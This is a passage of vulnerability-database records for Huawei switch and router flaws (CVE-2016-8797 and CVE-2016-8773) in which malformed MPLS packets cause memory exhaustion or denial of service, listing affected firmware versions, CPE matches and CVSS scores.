                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-04-02T19:57:01",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               ID: "CVE-2016-8797",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "AR3200,S12700,S5300,S5700,S6300,S6700,S7700,S9300,S9700 AR3200 V200R007C00, V200R005C32, V200R005C20,S12700 V200R008C00, V200R007C00,S5300 V200R008C00, V200R007C00, V200R006C00,S5700 V200R008C00, V200R007C00, V200R006C00,S6300 V200R008C00, V200R007C00,S6700 V200R008C00, V200R007C00,S7700 V200R008C00, V200R007C00, V200R006C00,S9300 V200R008C00, V200R007C00, V200R006C00,S9700 V200R008C00, V200R007C00, V200R006C00,",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "AR3200,S12700,S5300,S5700,S6300,S6700,S7700,S9300,S9700 AR3200 V200R007C00, V200R005C32, V200R005C20,S12700 V200R008C00, V200R007C00,S5300 V200R008C00, V200R007C00, V200R006C00,S5700 V200R008C00, V200R007C00, V200R006C00,S6300 V200R008C00, V200R007C00,S6700 V200R008C00, V200R007C00,S7700 V200R008C00, V200R007C00, V200R006C00,S9300 V200R008C00, V200R007C00, V200R006C00,S9700 V200R008C00, V200R007C00, V200R006C00,",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei AR3200 with software V200R007C00, V200R005C32, V200R005C20; S12700 with software V200R008C00, V200R007C00; S5300 with software V200R008C00, V200R007C00, V200R006C00; S5700 with software V200R008C00, V200R007C00, V200R006C00; S6300 with software V200R008C00, V200R007C00; S6700 with software V200R008C00, V200R007C00; S7700 with software V200R008C00, V200R007C00, V200R006C00; S9300 with software V200R008C00, V200R007C00, V200R006C00; and S9700 with software V200R008C00, V200R007C00, V200R006C00 allow remote attackers to send abnormal Multiprotocol Label Switching (MPLS) packets to cause memory exhaustion.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "memory leak",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2016-8797",
      datePublished: "2017-04-02T20:00:00",
      dateReserved: "2016-10-18T00:00:00",
      dateUpdated: "2024-08-06T02:35:02.049Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

var-201704-0502
Vulnerability from variot

Huawei S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 with software V200R007C00, V200R008C00, V200R009C00; S9300 with software V200R007C00, V200R008C00, V200R009C00; S9700 with software V200R007C00, V200R008C00, V200R009C00; and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 allow the attacker to cause a denial of service condition by sending malformed MPLS packets. Multiple Huawei Product has a service disruption (DoS) There are vulnerabilities that are put into a state.An attacker could create a malformed MPLS Service interruption due to packet transmission (DoS) There is a possibility of being put into a state. Huawei S9700 is the S series switch of China Huawei. A denial of service vulnerability exists in several Huawei products due to the failure of the program to properly verify MultiprotocolLabelSwitching (MPLS) messages. Multiple Huawei products are prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the affected device, denying service to legitimate users. The following products and versions are affected: Huawei S9700 V200R009C00 , V200R008C00 , V200R007C00 ; Huawei S9300 V200R009C00 , V200R008C00 , V200R007C00 ; Huawei S7700 V200R009C00 , V200R008C00 , V200R007C00 ; Huawei S6700 V200R009C00 , V200R008C00 , V200R005C00 , V200R003C00 , V200R002C00 , V200R001C01 , V200R001C00 ; Huawei S6300 V200R009C00 , V200R008C00 , V200R005C00 , V200R003C00 ; Huawei S5700 V200R009C00 , V200R008C00 , V200R007C00 , V200R005C00 , V200R003C00 , V200R002C00 , V200R001C00 ; Huawei S5300 V200R009C00 , V200R008C00 , V200R007C00 , V200R003C00 ; Huawei S12700 V200R009C00 , V200R008C00 , V200R007C01 , V200R007C00

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0502",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5700 v200r005c00",
            scope: null,
            trust: 1.5,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r008c00",
            scope: null,
            trust: 1.5,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c03",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c01",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s7700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r001c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r001c01",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r002c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r002c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r007c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r007c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r007c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r007c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r007c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r007c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r009c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r009c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r009c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r009c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r009c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r009c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r009c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r007c01",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r009c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r005c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r009c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "BID",
            id: "94285",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r007c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The vendor reported this issue.",
      sources: [
         {
            db: "BID",
            id: "94285",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2016-8773",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 5,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-8773",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2016-11388",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
